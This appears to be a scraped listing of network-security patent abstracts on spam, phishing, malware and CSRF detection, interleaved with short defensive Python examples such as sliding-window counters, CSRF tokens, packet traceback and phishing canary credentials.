20100229237Dual Use Counters for Routing Loops and Spam Detection - A method for detecting an undesirable condition within a messaging network. A message is received and a source of the message is identified. If an entry in a database for the source has not been created, an entry is created. A source counter for the source is then set to one and a timestamp is created for the source. If an entry in the database for the source has been previously created, the source counter is incremented by one and the timestamp is updated. The source counter is then compared to a source threshold, and if the source counter exceeds the source threshold over the course of a predetermined amount of time, a source alarm is triggered. A sliding window with respect to the predetermined amount of time may also be implemented to account for total counts that may fall across or be split by set periods of time. The invention is particularly useful for detecting “spam” events and undesirable routing loops.09-09-2010
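The point of the sliding window in the entry above is the burst that straddles a period boundary, so here is an added example (not the patent's code) with both variants side by side: a per-source counter that is reset at each clock-aligned period, and the sliding-window counter that keeps the timestamps of the last `window_seconds`. The event stream, source names, threshold and window length are constructed for illustration.

```python
from collections import defaultdict, deque


class SlidingWindowSourceCounter:
    """Per-source event counter over a sliding time window.

    Each observed message (or packet) adds a timestamp for its source; events
    older than `window_seconds` are dropped, so the count is always 'events
    from this source in the last window_seconds' regardless of where the
    burst falls relative to clock-aligned periods.
    """

    def __init__(self, source_threshold: int, window_seconds: float):
        self.threshold = source_threshold
        self.window = window_seconds
        self._events = defaultdict(deque)  # source -> timestamps inside window

    def observe(self, source: str, now: float) -> bool:
        """Record one event from `source` at `now`; True means the source count
        now exceeds the threshold within the window (source alarm)."""
        q = self._events[source]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) > self.threshold

    def count(self, source: str) -> int:
        return len(self._events[source])


class FixedPeriodSourceCounter:
    """The naive variant: the source counter is reset whenever a new
    clock-aligned period starts, so a burst split across a boundary is missed."""

    def __init__(self, source_threshold: int, period_seconds: float):
        self.threshold = source_threshold
        self.period = period_seconds
        self._state = {}  # source -> (period_index, count)

    def observe(self, source: str, now: float) -> bool:
        period = int(now // self.period)
        idx, count = self._state.get(source, (period, 0))
        count = count + 1 if idx == period else 1
        self._state[source] = (period, count)
        return count > self.threshold


def detect_bursts(counter, events):
    """Feed (timestamp, source) events in order; return sources that alarmed."""
    alarmed = []
    for ts, src in events:
        if counter.observe(src, ts) and src not in alarmed:
            alarmed.append(src)
    return alarmed


# Constructed sample (not from the page): four messages from one relay within
# four seconds, straddling the 10-second boundary, plus one from another relay.
# A mail loop (the relay keeps resubmitting the same message) and a spam burst
# look identical to the counter, which is why one counter serves both.
SAMPLE_EVENTS = [(8.0, "relay-a"), (9.0, "relay-a"), (9.5, "relay-b"),
                 (11.0, "relay-a"), (12.0, "relay-a")]

if __name__ == "__main__":
    print("fixed  :", detect_bursts(FixedPeriodSourceCounter(3, 10.0), SAMPLE_EVENTS))
    print("sliding:", detect_bursts(SlidingWindowSourceCounter(3, 10.0), SAMPLE_EVENTS))
```

With threshold 3 and a 10-second window the fixed-period counter sees two events in each period and never alarms, while the sliding window alarms on the fourth event at t=12.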
20100229236METHOD AND SYSTEM FOR SPAM REPORTING WITH A MESSAGE PORTION - Methods and systems for spam reporting with a message portion are described. In one embodiment, an electronic message is received on a mobile electronic device. A spam report policy is used on the mobile electronic device to identify a portion of the electronic message to include with a spam report. The spam report is transmitted from the mobile electronic device to a server, the spam report notifying the server that the electronic message is spam and including the portion of the electronic message without including a copy of the entire electronic message.09-09-2010
20100229235REGION ACCESS AUTHORIZATION IN A VIRTUAL ENVIRONMENT - The passage of avatars into and out of regions in a virtual universe is regulated through the use of secure communications between and among the avatar, an authority managing the region and a trusted third party who maintains a database of avatar characteristics. Permission to move from one virtual region to another is determined based upon the avatar characteristics.09-09-2010
20120137361NETWORK SECURITY CONTROL SYSTEM AND METHOD, AND SECURITY EVENT PROCESSING APPARATUS AND VISUALIZATION PROCESSING APPARATUS FOR NETWORK SECURITY CONTROL - A network security control system includes: a network event generator for generating network events; a security event processing apparatus for collecting the network events from the network event generator via a network and processing the collected network events as target data for visualization; and a visualization processing apparatus for visualizing the target data to display a security status as three-dimensional (3D) visualization information on an organization basis.05-31-2012
20100192223Detecting Malicious Network Content Using Virtual Environment Components - Malicious network content is identified based on the behavior of one or more virtual environment components which process network content in a virtual environment. Network content can be monitored and analyzed using a set of heuristics. The heuristics identify suspicious network content communicated over a network. The suspicious network content can further be analyzed in a virtual environment that includes one or more virtual environment components. Each virtual environment component is configured to mimic live environment components, for example a browser application component or an operating system component. The suspicious network content is replayed in the virtual environment using one or more of the virtual environment components. The virtual environment component behavior is analyzed in view of an expected behavior to identify malicious network content. The malicious network content is then identified and processed.07-29-2010
20100192222MALWARE DETECTION USING MULTIPLE CLASSIFIERS - A method of identifying a malware file using multiple classifiers is disclosed. The method includes receiving a file at a client computer. The file includes static metadata. A set of metadata classifier weights are applied to the static metadata to generate a first classifier output. A dynamic classifier is initiated to evaluate the file and to generate a second classifier output. The method includes automatically identifying the file as potential malware based on at least the first classifier output and the second classifier output.07-29-2010
20130014255System and Method for Providing Network Security - A method includes receiving an indication of at least one detected security issue at a network device. The indication is received at a security manager processor from a security agent. The method includes selecting, via the security manager processor, at least one executable security object responsive to the indication. The security manager processor verifies compatibility between the at least one executable security object, the network device, and communication media. The method also includes sending the at least one executable security object to the network device via the security manager processor to provide a protective security measure to the network device against the at least one detected security issue upon execution of the at least one executable security object.01-10-2013
20130014254RESPONDING TO A MAINTENANCE FREE STORAGE CONTAINER SECURITY THREAT - A method for responding to a security threat for a maintenance free storage container begins by a dispersed storage (DS) processing module identifying a security threat for the maintenance free storage container, wherein the maintenance free storage container allows for multiple storage servers of a plurality of storage servers to be in a failure mode without replacement. The method continues with the DS processing module determining a failure mode level that is indicative of whether one or more of the multiple storage servers are in the failure mode. The method continues with the DS processing module selecting a security threat countermeasure based on the security threat and the failure mode level. The method continues with the DS processing module implementing the security threat countermeasure.01-10-2013
20130014253Network Protection Service - A network protection method is provided. The network protection method may include receiving a Domain Name System (DNS) request, logging the DNS request, classifying the DNS request based on an analysis of a DNS name associated with the DNS request, taking a security action based on the classification, analyzing network traffic after taking the security action, and providing substantially real-time feedback associated with the network traffic to improve future DNS request classifications. The method may further include receiving a DNS response and logging the DNS response. The analysis of the DNS name may include receiving DNS data related to the DNS name from a plurality of sources, receiving reputation data related to the plurality of sources, scoring each of the plurality of sources based on the reputation data, and aggregating the DNS data related to the DNS name based on the scoring.01-10-2013
20100132036VERIFICATION OF OUTSOURCED DATA STREAMS - Embodiments disclosed herein are directed to verifying query results of an untrusted server. A data owner outsources a data stream to the untrusted server, which is configured to respond to a query from a client with the query result, which is returned to the client. The data owner can maintain a vector associated with query results returned by the server and can generate a verification synopsis using the vector and a seed. The verification synopsis includes a polynomial, where coefficients of the polynomial are determined based on the seed. The data owner outputs the verification synopsis and the seed to a client for verification of the query results.05-27-2010
20120151580COMPUTING SYSTEM - Disclosed is a computing system which comprises a data processing device exchanging communication data with an external device and processing the communication data; and a security integrated circuit (IC) monitoring the communication data.06-14-2012
20130019308Method and Device for Preventing CSRF Attack - The disclosure provides a method for preventing CSRF attacks, comprising: intercepting a request sent from a client browser to a server; generating a token; generating a response to the request; inserting the token into the response to the request; and sending the response, with the token inserted, to the client browser. With the method of the disclosure, it is assured that a token is inserted into all the requests made by a user through a client browser for accessing a resource, and it can be assured that a request was issued by the user himself by verifying whether the token in the request is valid, thereby preventing a CSRF attack.01-17-2013
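An added example (not the patent's code) of the intercept-insert-verify loop above, written as two interceptors around an HTML-serving application: the response interceptor puts a hidden token field into every form, and the request interceptor rejects state-changing requests whose token is missing or does not match the token minted for the session. Assumptions not in the abstract: the token is an HMAC of the session identifier under a server secret (so it needs no server-side token store), and the sample markup, session identifiers and secret are constructed for illustration.

```python
import hashlib
import hmac
import re

# Assumption (not from the page): a server-side secret shared by the
# interceptor that inserts tokens and the one that verifies them.
SERVER_SECRET = b"rotate-me-out-of-band"
TOKEN_FIELD = "csrf_token"
FORM_TAG = re.compile(r"(<form\b[^>]*>)", re.IGNORECASE)


def make_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token bound to the user's session: a forged cross-site request rides on
    the victim's cookies, but the attacker's page cannot read this value."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def insert_token(html: str, token: str) -> str:
    """Response interceptor: every <form> in the outgoing page gets a hidden
    token field, so every form submission the browser makes carries it."""
    hidden = f'<input type="hidden" name="{TOKEN_FIELD}" value="{token}">'
    return FORM_TAG.sub(lambda m: m.group(1) + hidden, html)


def verify_request(session_id: str, fields: dict, secret: bytes = SERVER_SECRET) -> bool:
    """Request interceptor: the token must be present and equal the one minted
    for this session (constant-time comparison)."""
    supplied = fields.get(TOKEN_FIELD)
    if not supplied:
        return False
    return hmac.compare_digest(supplied, make_token(session_id, secret))


# Constructed sample response (not from the page).
RESPONSE_HTML = """<html><body>
<form method="post" action="/transfer"><input name="amount"></form>
<form method="post" action="/profile"><input name="email"></form>
</body></html>"""


if __name__ == "__main__":
    session = "sess-42"
    page = insert_token(RESPONSE_HTML, make_token(session))
    print(page)
    # A submission of the form above carries the token and is accepted;
    # a cross-site request from an attacker page does not and is refused.
    print(verify_request(session, {"amount": "10", TOKEN_FIELD: make_token(session)}))
    print(verify_request(session, {"amount": "10"}))
```

Verification should be applied to every state-changing request (POST, PUT, DELETE), not to safe GETs, and forms that post to a third-party origin must be excluded from token insertion or the token leaks to that origin.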
20130019307Secure Computer Architecture - A secure computer architecture is provided. With this architecture, data is received, in a component of an integrated circuit chip implementing the secure computer architecture, for transmission across a data communication link. The data is converted, by the component, to one or more first fixed length frames. The one or more first fixed length frames are then transmitted, by the component, on the data communication link in a continuous stream of frames. The continuous stream of frames includes one or more second fixed length frames generated when no data is available for inclusion in the frames of the continuous stream.01-17-2013
20130019306Remote-Assisted Malware Detection (inventors: Horacio Andres Lagar-Cavilla, Morris Plains, NJ, US; Alexander Varshavsky, East Hanover, NJ, US) - Remote assistance is provided to a mobile device across a network to enable malware detection. The mobile device transmits potentially infected memory pages to a remote server across a network. The remote server performs analysis, and provides feedback to the mobile device. Based on the received feedback, the mobile device halts a process, or retrieves and transmits additional memory pages to the remote server for more analysis. This process is repeated until a compromised region of memory is identified and/or isolated for further repair to be performed. The feedback from the remote server reduces the processing and storage burden on the mobile device, resulting in a more reliable detection that uses fewer resources. Embodiments including hypervisors and virtual machines are disclosed.01-17-2013
20110162069SUSPICIOUS NODE DETECTION AND RECOVERY IN MAPREDUCE COMPUTING - Embodiments of the present invention address deficiencies of the art in respect to distributed computing for large data sets on clusters of computers and provide a novel and non-obvious method, system and computer program product for detecting and correcting malicious nodes in a cloud computing environment (e.g., MapReduce computing). In one embodiment of the invention, a computer-implemented method for detecting and correcting malicious nodes in a cloud computing environment can include selecting a task to dispatch to a first worker node, setting a suspicion index threshold for the selected task, determining a suspicion index for the selected task, comparing the suspicion index to the suspicion index threshold and receiving a result from a first worker node. The method further can include applying a recovery action when the suspicion index exceeds the selected suspicion index threshold.06-30-2011
20130024934CLASSIFICATION OF SOFTWARE ON NETWORKED SYSTEMS - A method and system for the classification of software in networked systems, includes: determining a software received by a sensor is attempting to execute on a computer system of the sensor; classifying the software as authorized or unauthorized to execute, and gathering information on the software by the sensor if the software is classified as unauthorized to execute. The sensor sends the information on the software to one or more actuators, which determine whether or not to act on one or more targets based on the information. If so, then the actuator sends a directive to the target(s). The target(s) updates its responses according to the directive. The classification of the software is definitive and is not based on heuristics or rules or policies and without any need to rely on any a priori information about the software.01-24-2013
20130024933AUDITING A DEVICE - The auditing of a device that includes a physical memory is disclosed. One or more hardware parameters that correspond to a hardware configuration is received. Initialization information is also received. The physical memory is selectively written in accordance with a function. The physical memory is selectively read and at least one result is determined. The result is provided to a verifier.01-24-2013
20130024935SYSTEM, METHOD, AND COMPUTER PROGRAM PRODUCT FOR CONDITIONALLY PERFORMING A SCAN ON DATA BASED ON AN ASSOCIATED DATA STRUCTURE - A system, method, and computer program product are provided for conditionally performing a scan of data based on an associated data structure. In use, at least one aspect is identified for each of a first plurality of scanners utilized to perform a scan on data at a first network device. Additionally, at least one data structure is associated with the data, where the at least one data structure reflects the at least one aspect of each of the first plurality of scanners. Furthermore, a subsequent scan on the data is conditionally performed utilizing each of a second plurality of scanners at a second network device, based on the at least one data structure.01-24-2013
20080244739METHOD AND SYSTEM FOR RESILIENT PACKET TRACEBACK IN WIRELESS MESH AND SENSOR NETWORKS - A system and method for packet traceback in a network includes maintaining an identity number (ID) for each node in a network and generating a signature (e.g., a message authentication code (MAC)) using a secret key shared between each node on a forwarding path and a sink. Each forwarding node leaves a mark by appending its ID and a signature in the packet, either in a deterministic manner or with a probability. Upon receiving a packet at the sink, correctness of the signatures included in each packet is verified in the reverse order by which these signatures were appended. A last valid MAC is determined in the forwarding path to determine the locations of compromised nodes that collude in false data injection attacks.10-02-2008
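An added example (not the patent's code) of the deterministic-marking variant in the entry above: each forwarding node appends its ID and a MAC computed under its key shared with the sink, the MAC covering the payload and every mark already in the packet; the sink verifies the marks in reverse order of appending and reports the node that produced the last valid MAC, which bounds where a false-data injection entered the path. Assumptions not in the abstract: HMAC-SHA256 truncated to 8 bytes as the per-hop signature, node names, keys and payloads constructed for illustration.

```python
import hashlib
import hmac
from typing import List, Optional, Tuple

MAC_LEN = 8  # assumption: truncated MAC to keep per-hop overhead small on sensor nodes


def _mac(key: bytes, payload: bytes, prior_marks: List[Tuple[str, bytes]]) -> bytes:
    """MAC over the payload and every mark already in the packet, so a node's
    mark also commits to the path recorded before it."""
    h = hmac.new(key, payload, hashlib.sha256)
    for node_id, mac in prior_marks:
        h.update(node_id.encode())
        h.update(mac)
    return h.digest()[:MAC_LEN]


def forward(packet: dict, node_id: str, key: bytes) -> dict:
    """Deterministic marking: each forwarding node appends (ID, MAC)."""
    packet["marks"].append((node_id, _mac(key, packet["payload"], packet["marks"])))
    return packet


def trace(packet: dict, keys: dict) -> Tuple[Optional[str], List[str]]:
    """Sink-side verification, walking the marks back from the sink.

    Returns (last_valid_node, unverified_ids). last_valid_node is the node whose
    MAC was the last to verify when walking back from the sink; the marks
    upstream of the first failure (including the failed one) are returned as
    unverified, since nothing in that region can prove its participation.
    A clean path returns the first forwarding node and an empty list.
    """
    marks = packet["marks"]
    payload = packet["payload"]
    last_valid = None
    for i in range(len(marks) - 1, -1, -1):
        node_id, mac = marks[i]
        key = keys.get(node_id)
        if key is None or not hmac.compare_digest(_mac(key, payload, marks[:i]), mac):
            return last_valid, [nid for nid, _ in marks[: i + 1]]
        last_valid = node_id
    return last_valid, []


# Constructed scenario (not from the page): path A -> B -> C -> sink, with
# per-node keys shared with the sink.
KEYS = {"A": b"key-A", "B": b"key-B", "C": b"key-C"}


def honest_packet() -> dict:
    pkt = {"payload": b"temp=21.5 src=A", "marks": []}
    for node in ("A", "B", "C"):
        forward(pkt, node, KEYS[node])
    return pkt


def injected_packet() -> dict:
    """Compromised B fabricates a reading 'from A', forges A's mark with a
    guessed key (it does not hold key-A), signs with its own real key, and
    honest C marks the packet as usual."""
    pkt = {"payload": b"temp=99.9 src=A", "marks": []}
    forward(pkt, "A", b"guessed-key")
    forward(pkt, "B", KEYS["B"])
    forward(pkt, "C", KEYS["C"])
    return pkt


if __name__ == "__main__":
    print("honest  :", trace(honest_packet(), KEYS))
    print("injected:", trace(injected_packet(), KEYS))
```

The boundary reported for the injected packet is B: C's and B's marks verify, A's does not, so the injection happened at B or was relayed through B without a genuine upstream chain. Colluders downstream of B cannot move that boundary further upstream without A's key.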
20080235797Method, Apparatus, and Program to Forward and Verify Multiple Digital Signatures in Electronic Mail - A mechanism is provided for augmenting the mail header of a message with a list of digital signatures representing the chain of contributors to the message. The augmented header may also encode the actual contributions corresponding to each digital signature. The list is appended every time a message is forwarded. If a message has a portion with no corresponding digital signature or if one or more of the digital signatures is not trusted, the user may handle the message accordingly. Furthermore, a mail server or client may discard a message if the number of digital signatures exceeds a threshold to filter out unwanted messages, such as e-mail chain letters.09-25-2008
20080235795System and Method for Confirming Digital Content - A system for confirming digital content and methods for making and using same. The system and methods comprise determining how to search for a file. The system and methods comprise searching for a file and selectively obtaining a file. Further, they comprise verifying a file, and subsequently categorizing the file. A file that is verified can be recorded as such, thereby preventing the file from being re-verified. The file can be stored along with information about the file. The file and its information can be sent to a data reporting system or interface. An advantageous aspect of the present invention is the ability to perform semi-autonomously.09-25-2008
20080235794PROTECTION AGAINST IMPERSONATION ATTACKS - A computing method includes running on a user computer a first operating environment for performing general-purpose operations and a second operating environment, which is configured expressly for interacting with a server in a protected communication session and is isolated from the first operating environment. A program running in the second operating environment detects an attempt to imitate the protected communication session made by an illegitimate communication session that interacts with the first operating environment. The detected attempt is inhibited automatically.09-25-2008
20080235792Prefix matching algorithm - A prefix matching algorithm and method thereof are disclosed. The prefix matching engine for matching a prefix of an input stream against prefixes of predefined signatures includes prefix logic, a prefix look-up table storing prefix information of the predefined signatures and a table entry buffer. According to a portion of the input stream, the prefix logic is capable of accessing a predetermined number of table entries in the prefix look-up table and stores the table entry values of the predetermined number of table entries in the table entry buffer. By examining the temporary table entry values in the table entry buffer, the prefix logic determines whether a prefix match is found.09-25-2008
20080229414Endpoint enabled for enterprise security assessment sharing - An enterprise-wide sharing arrangement uses a semantic abstraction, called a security assessment, to share security-related information between security products, called endpoints. A security assessment is defined as a tentative assignment by an endpoint of broader contextual meaning to information that is collected about an object of interest. Endpoints utilize an architecture that comprises a common assessment sharing agent and a common assessment generating agent. The common assessment sharing agent is arranged for subscribing to security assessments, publishing security assessments onto a channel, maintaining an awareness of configuration changes on the channel (e.g., when a new endpoint is added or removed), and implementing security features like authorization, authentication and encryption. A common assessment generating engine handles endpoint behavior associated with a security assessment including assessment generation, cancellation, tracking, and rolling-back actions based on assessments that have expired. The common assessment generating engine generates and transmits messages that indicate which local actions are taken.09-18-2008
20110247069SYSTEM, METHOD AND COMPUTER PROGRAM PRODUCT FOR DETERMINING A RISK SCORE FOR AN ENTITY - In accordance with embodiments, there are provided mechanisms and methods for determining a risk score for an entity. These mechanisms and methods for determining a risk score for an entity can enable more effective monitoring of a system, can create more relevant data associated with the entity, etc.10-06-2011
20110247068Method And Apparatus For Enhanced Security In A Data Communications Network - A method and apparatus for enhancing the security of a data communications network. When a packet or other data unit enters the network, an associated geolocation is ascertained and a value representing that geolocation, that is, geolocation information, is inserted into the packet. When a packet is about to leave the network, the previously inserted geolocation information is analyzed, and in most cases removed, and a decision is made according to the analysis as to whether to forward the packet or discard it due to a suspect character. In some cases, suspect packets are instead flagged and forwarded, sometimes in connection with sending a warning to the intended recipient.10-06-2011
20080222723MONITORING AND CONTROLLING APPLICATIONS EXECUTING IN A COMPUTING NODE - A method and system for monitoring and controlling applications executing on computing nodes of a computing system. A status request process, one or more control processes, an untrusted application and one other application are executed on a computing node. The status request process receives and processes requests for the statuses of the untrusted and the other application. A first control process controls the execution of the untrusted application. A second control process controls the execution of the other application. The execution of the untrusted application terminates based on a failure of the untrusted application. A capability of the status request process to receive and process the requests for statuses, and a capability of the second control process to control the execution of the other application are preserved in response to the termination of the untrusted application.09-11-2008
20130179968SYSTEMS, METHODS, AND MEDIA FOR GENERATING SANITIZED DATA, SANITIZING ANOMALY DETECTION MODELS, AND/OR GENERATING SANITIZED ANOMALY DETECTION MODELS - Systems, methods, and media for generating sanitized data, sanitizing anomaly detection models, and generating anomaly detection models are provided. In some embodiments, methods for sanitizing anomaly detection models are provided. The methods including: receiving at least one abnormal anomaly detection model from at least one remote location; comparing at least one of the at least one abnormal anomaly detection model to a local normal detection model to produce a common set of features common to both the at least one abnormal anomaly detection model and the local normal detection model; and generating a sanitized normal anomaly detection model by removing the common set of features from the local normal detection model.07-11-2013
20130179967Method to deter software tampering using interlinked sub-processes - A method is disclosed for deterring the reverse engineering of computer software code. The method involves the recognition of an unauthorized access attempt by one of a plurality of linked sub-processes embedded in the computer software code. In response to the unauthorized attempt, each of the sub-processes begins a recursive execution, resulting in computer system resources being increasingly diverted to the linked sub-processes, making it difficult to continue unauthorized attempts to access the computer software code.07-11-2013
20130145462Phishing Processing Method and System and Computer Readable Storage Medium Applying the Method - A phishing processing method includes: receiving an information input web page comprising an information input interface through which information is transmitted to an information receiving address; determining whether the information input web page is a phishing web page; and, if it is determined that the information input web page is a phishing web page, transmitting fake input information to the information receiving address. When information for verification is later received from an information transmitting address, it is determined whether the received information for verification is the fake input information. If the received information for verification is the fake input information, the information transmitting address is determined to be a malicious address.06-06-2013
20130145461Security Method for Mobile Ad Hoc Networks with Efficient Flooding Mechanism Using Layer Independent Passive Clustering (LIPC) - A security method and system for Layer Independent Passive Clustering (LIPC) is presented. The inventive method and system maintains the states in the LIPC cluster formation protocol while adding a ‘Trustworthy’ event to each state and provides a methodology that depends on the state of the transmitting node to quantify trustworthiness and derive a Trust Confidence Value (TCV) representing the level of confidence in that ‘Trustworthy’ assessment. The invention dynamically computes a degree of trustworthiness for each participating network node and eliminates nodes from participating in the PC cluster formation protocol and packet forwarding if they do not meet established trust metrics. The security solution can also apply to PC-based Mobile Ad hoc Networks (MANETs). The novel system and method applies a multidimensional set of security algorithms to protect the LIPC cluster formation protocol from malicious attacks that compromise cluster formation and secure routing.06-06-2013
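The canary-credential flow in the phishing processing entry (20130145462, two entries above) is worth seeing end to end, so here is an added example that is not the patent's code: a suspected phishing form is judged by whether it posts off-site, fabricated credentials are seeded to its receiving address and remembered, and the real login endpoint flags any address that later presents them. The off-site test, the generated credential shape and the sample addresses are assumptions for illustration.

```python
import secrets
from urllib.parse import urljoin, urlparse


def form_posts_offsite(page_url: str, form_action: str) -> bool:
    """Assumed phishing indicator (not the page's criterion): the input form
    sends its data to a host other than the one serving the page."""
    page_host = urlparse(page_url).netloc.lower()
    target_host = urlparse(urljoin(page_url, form_action)).netloc.lower()
    return target_host != page_host


class PhishingCanary:
    """Seed a suspected phishing form with fabricated credentials, then watch
    the genuine login endpoint: whoever presents those credentials obtained
    them from the phishing drop, so the presenting address is malicious."""

    def __init__(self):
        self._canaries = {}            # (username, password) -> receiving address seeded
        self.malicious_addresses = {}  # transmitting address -> receiving address it traces to

    def seed(self, receiving_address: str) -> dict:
        """Fabricate one credential pair per receiving address and record it."""
        username = "user" + secrets.token_hex(3)
        password = secrets.token_urlsafe(12)
        self._canaries[(username, password)] = receiving_address
        return {"username": username, "password": password, "to": receiving_address}

    def check_login(self, username: str, password: str, transmitting_address: str) -> bool:
        """Called by the genuine login endpoint for every attempt. Returns True
        (and records the address) when the attempt uses fabricated credentials."""
        origin = self._canaries.get((username, password))
        if origin is None:
            return False
        self.malicious_addresses[transmitting_address] = origin
        return True


# Constructed scenario (not from the page).
PAGE_URL = "https://bank.example/login"
PHISH_ACTION = "https://login-verify.example/collect"


def run_scenario() -> dict:
    canary = PhishingCanary()
    seeded = canary.seed(PHISH_ACTION) if form_posts_offsite(PAGE_URL, PHISH_ACTION) else None
    # Later: the attacker replays the harvested pair from 203.0.113.7,
    # while a legitimate user logs in from 198.51.100.2.
    hit = canary.check_login(seeded["username"], seeded["password"], "203.0.113.7")
    miss = canary.check_login("alice", "correct horse battery staple", "198.51.100.2")
    return {"seeded": seeded, "hit": hit, "miss": miss,
            "malicious": dict(canary.malicious_addresses)}


if __name__ == "__main__":
    print(run_scenario())
```

The canary pair must never collide with a real account and should be unique per receiving address, so that a replay identifies which phishing drop it came from as well as who is replaying it.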
20130145463METHODS AND APPARATUS FOR CONTROL AND DETECTION OF MALICIOUS CONTENT USING A SANDBOX ENVIRONMENT - A non-transitory processor-readable medium storing code representing instructions to cause a processor to perform a process includes code to cause the processor to receive a set of indications of allowed behavior associated with an application. The processor is also caused to initiate an instance of the application within a sandbox environment. The processor is further caused to receive, from a monitor module associated with the sandbox environment, a set of indications of actual behavior of the instance of the application in response to initiating the instance of the application within the sandbox environment. The processor is also caused to send an indication associated with an anomalous behavior if at least one indication from the set of indications of actual behavior does not correspond to an indication from the set of indications of allowed behavior.06-06-2013
20120254997METHODS AND APPARATUSES FOR AVOIDING DAMAGE IN NETWORK ATTACKS - Methods and apparatuses in a client terminal (10-04-2012
20120254995SYSTEM AND METHOD FOR BELOW-OPERATING SYSTEM TRAPPING AND SECURING LOADING OF CODE INTO MEMORY - A system for protecting an electronic device against malware includes a memory, an operating system configured to execute on the electronic device, and a below-operating-system security agent. The below-operating-system security agent is configured to trap an attempted access of a resource of the electronic device, access one or more security rules to determine whether the attempted access is indicative of malware, and operate at a level below all of the operating systems of the electronic device accessing the memory. The attempted access includes attempting to write instructions to the memory and attempting to execute the instructions.10-04-2012
20120254993SYSTEM AND METHOD FOR VIRTUAL MACHINE MONITOR BASED ANTI-MALWARE SECURITY - A system for securing an electronic device includes a memory, a processor, one or more operating systems residing in the memory for execution by the processor, a resource of the electronic device communicatively coupled to the operating system, a virtual machine monitor configured to execute on the electronic device at a level below all of the operating systems of the electronic device accessing the resource, and a security agent configured to execute on the electronic device at a level below all operating systems of the electronic device accessing the resource. The virtual machine monitor is configured to intercept a request of the resource made from a level above the virtual machine monitor and inform the security agent of the request. The security agent is configured to determine whether the request is indicative of malware.10-04-2012
20130091568SYSTEMS AND METHODS FOR SECURE IN-VM MONITORING - Security systems can provide secure and efficient in-VM monitoring. An exemplary security system can be built upon hardware virtualization features and can comprise a virtual machine having a plurality of standard virtual address spaces, as well as a hidden virtual address space. While the standard virtual address spaces can be directly accessible by a kernel in the virtual machine, the hidden virtual address space can be hidden from the kernel, which can be absent a virtual page table corresponding to the hidden virtual address space. A security monitor can reside in the hidden address space, monitoring the kernel without being modifiable by the kernel. A processor can transfer focus from the standard virtual address spaces to the hidden virtual address space only through predetermined entry gates, and the processor can transfer focus from the hidden virtual address space to the standard virtual address spaces only through predetermined exit gates.04-11-2013
20130091569LOGIN INITIATED SCANNING OF COMPUTING DEVICES - Embodiments of the invention relate to systems, methods, and computer program products for login initiated remote scanning of computer devices. The present invention detects login to the network via access management systems. The login data provides information that identifies the device so that the device can be checked against a scan database to determine if and when a previous scan occurred. Based on the findings in the scan database determinations are made as to whether to perform a scan. Additionally, the level of scanning can be determined based on previous scan dates and previous scan results, which may dictate customized scanning. In addition, the priority of the impending scan may be dictated by previous scan dates and results. Further embodiments provide for assessing risk, such as risk scoring or the like, concurrently or in near-real-time with the completion of the scan so that alerts may be communicated.04-11-2013
20130091567DEVICE AND METHOD FOR ENERGY MANAGEMENT IN A HOUSEHOLD - An energy management system comprises one or more appliances, a remote device, and a communication device. In one embodiment, the communication device forms a physical connection with the remote device and thereafter a physical connection with an associated appliance. The first physical connection binds the communication device to the remote device, thereby forming a secure connection over which inputs and outputs can be exchanged between the remote device and the associated appliance when the communication device is connected to the appliance.04-11-2013
20130091566INTERNET PROTOCOL ADDRESS SPACE MANAGEMENT TO MITIGATE AND DETECT CLOAKING AND OTHER ABUSE - In one embodiment, an intelligent detection system 04-11-2013
20130097699SYSTEM AND METHOD FOR DETECTING A MALICIOUS COMMAND AND CONTROL CHANNEL - A method is provided in one example embodiment that includes detecting repetitive connections from a source node to a destination node, calculating a score for the source node based on the connections, and taking a policy action if the score exceeds a threshold score. In more particular embodiments, the repetitive connections use a hypertext transfer protocol and may include connections to a small number of unique domains, connections to a small number of unique resources associated with the destination node, and/or a large number of connections to a resource in a domain. Moreover, heuristics may be used to score the source node and identify behavior indicative of a threat, such as a bot or other malware.04-18-2013
20130097701USER BEHAVIORAL RISK ASSESSMENT - A particular activity performed by a particular user of a computing device is identified, for instance, by an agent installed on the computing device. It is determined that the particular activity qualifies as a particular use violation in a plurality of pre-defined use violations. A behavioral risk score for the particular user is determined based at least in part on the determination that the particular activity of the particular user qualifies as a particular use violation. Determining that the particular activity qualifies as a particular use violation can include determining that the particular activity violates a particular rule or event trigger corresponding to a particular pre-defined use violation.04-18-2013
20130097703SYSTEM AND METHOD TO LOCATE A PREFIX HIJACKER WITHIN A ONE-HOP NEIGHBORHOOD - Method, system and computer-readable device to locate a prefix hijacker of a destination prefix within a one-hop neighborhood. The method includes generating one-hop neighborhoods from autonomous system-level paths associated with a plurality of monitors to a destination prefix. The method also includes determining a suspect set of autonomous system identifiers resulting from a union of the one-hop neighborhoods. The method further includes calculating a count and a distance associated with each autonomous system identifier in the suspect set of autonomous system identifiers. The count represents how often an autonomous system identifier appears in the one-hop neighborhoods. The distance represents a total number of autonomous system identifiers from the autonomous system identifier to autonomous system identifiers associated with the plurality of monitors. Yet further, the method includes generating a one-hop suspect set including autonomous system identifiers in the suspect set that have a greatest sum of the count and the distance.04-18-2013
20130097700Phishing Detecting Method and Network Apparatus and Computer Readable Storage Medium Applying the Method - A phishing detecting method includes: a web-page accessing request for accessing a target web page at a target address is received; the target web page from the target address is obtained; the target web page is snapshotted to obtain a present page snapshot; the present page snapshot is compared with several pre-stored page snapshots stored in a database, wherein each of the pre-stored page snapshots corresponds to a pre-stored address; if the present page snapshot matches one of the pre-stored page snapshots, the target address is compared with the pre-stored address, corresponding pre-stored page snapshot of which matches the present page snapshot; if the target address does not match the pre-stored address, the corresponding pre-stored page snapshot of which matches the present page snapshot, it is determined that the target web page is a phishing web page.04-18-2013
20130097702WEBSITE DEFACEMENT INCIDENT HANDLING SYSTEM, METHOD, AND COMPUTER PROGRAM STORAGE DEVICE - A website defacement incident handling system and associated methodology and non-transitory computer program storage device for detecting a defacement of a website and taking appropriate corrective action upon detection of the defacement. The website defacement incident handling system receives web page information and snapshot images corresponding to websites and performs comparisons against corresponding information and snapshot images of a reference website. Probability scores indicating the likelihood that a website has been defaced are calculated based on the comparisons and corrective actions are taken as appropriate to protect the affected website.04-18-2013
20130104229Private Domain Name Registration - A service for protecting the privacy of domain name registrants while preserving the registrant's ability to directly change the registration information or transfer the registration. A whois record is created that reflects the registrant's actual identity but contains contact information that is entirely associated with a privacy service.04-25-2013
20130104228STEALTH NETWORK NODE - A method, a network node, and a set of instructions are disclosed. A network interface 04-25-2013
